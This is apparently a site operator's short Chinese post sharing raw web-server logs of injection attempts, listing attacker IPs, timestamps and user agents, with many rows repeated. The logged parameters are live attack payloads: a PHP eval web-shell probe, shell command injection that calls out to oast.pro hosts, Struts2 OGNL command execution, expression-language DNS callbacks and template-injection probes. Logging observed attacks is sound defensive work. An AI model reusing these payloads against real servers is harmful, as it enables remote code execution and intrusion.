黑客对网站进行注入案例

今天通过日志分析系统发现,最近不少黑客对网站进行注入攻击。

<![if supportMisalignedColumns]> <![endif]>
日期时间I黑客P地址注入参数用户代理
2023/10/2512:06:1945.142.76.122s=/module/action/param1/${@print(eval($_POST[c]))}Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.2)
2023/11/1323:41:42141.98.255.144NodeCode=1050070011;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}&ID=1000000399484251;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/11/1323:41:42141.98.255.144NodeCode=1050020021;nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36
2023/11/1323:41:42141.98.255.144NodeCode=1050080021;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}&ID=1000009466152571;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/11/1323:41:42141.98.255.144NodeCode=1050070011;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}&ID=1000000399484251;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/11/1323:41:42141.98.255.144NodeCode=1050020021;nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36
2023/11/1323:41:42141.98.255.144NodeCode=1050080021;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}&ID=1000009466152571;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/11/1323:30:04141.98.255.144NodeCode=1050080021;nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}&ID=1000005622917961;nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36
2023/11/1323:30:04141.98.255.144NodeCode=1050050011;nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}&ID=1000000771673841;nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36
2023/11/1323:30:04141.98.255.144NodeCode=1050060011;nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}&ID=401;nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/11/149:18:18107.172.83.34search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36
2023/11/149:47:29107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36
2023/11/149:47:33107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/149:47:47107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/1412:24:16107.172.83.34id=F7IZsu%25{128*128}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36
2023/11/1416:28:52107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36
2023/11/1416:28:56107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/1416:33:43107.172.83.34_tn={{trimprefix(base64_decode(httoken),Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36
2023/11/1420:43:09107.172.83.34mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/1423:24:29107.172.83.34url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0qunwxsc1x9mgj.oast.pro|)}&mgrDn=a&pwd=aMozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36
2023/11/149:47:57107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36
2023/11/149:48:09107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36
2023/11/149:48:15107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36
2023/11/1410:16:18107.172.83.34response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/11/1412:24:16107.172.83.34id=F7IZsu%25{128*128}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36
2023/11/149:18:18107.172.83.34search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36
2023/11/149:47:29107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36
2023/11/149:47:33107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/149:47:47107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/149:47:57107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36
2023/11/149:48:09107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36
2023/11/149:48:15107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36
2023/11/1410:16:18107.172.83.34response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/11/1423:24:29107.172.83.34url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0qunwxsc1x9mgj.oast.pro|)}&mgrDn=a&pwd=aMozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36
2023/11/1416:28:52107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36
2023/11/1416:28:56107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/1416:33:43107.172.83.34_tn={{trimprefix(base64_decode(httoken),Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36
2023/11/1420:43:09107.172.83.34mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/149:18:18107.172.83.34search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.}Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36
2023/11/149:47:30107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/11/149:47:38107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/149:47:50107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36
2023/11/149:47:57107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/149:48:08107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36
2023/11/149:48:15107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36
2023/11/1410:16:18107.172.83.34response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testMozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36
2023/11/1420:43:08107.172.83.34mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36
2023/11/1423:24:29107.172.83.34url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0x36xyfapje9yw.oast.pro|)}&mgrDn=a&pwd=aMozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/11/149:18:18107.172.83.34search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.}Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/149:47:30107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36
2023/11/149:47:39107.172.83.34redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/149:47:54107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F
2023/11/149:48:01107.172.83.34action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36
2023/11/149:48:12107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36
2023/11/149:48:22107.172.83.34redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36
2023/11/1416:28:52107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36
2023/11/1412:24:16107.172.83.34id=F7IZsu%25{128*128}Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36
2023/11/1416:28:52107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36
2023/11/1416:29:00107.172.83.34uri={{228*|98|}}Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36
2023/11/1416:33:46107.172.83.34_tn={{trimprefix(base64_decode(httoken),Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36
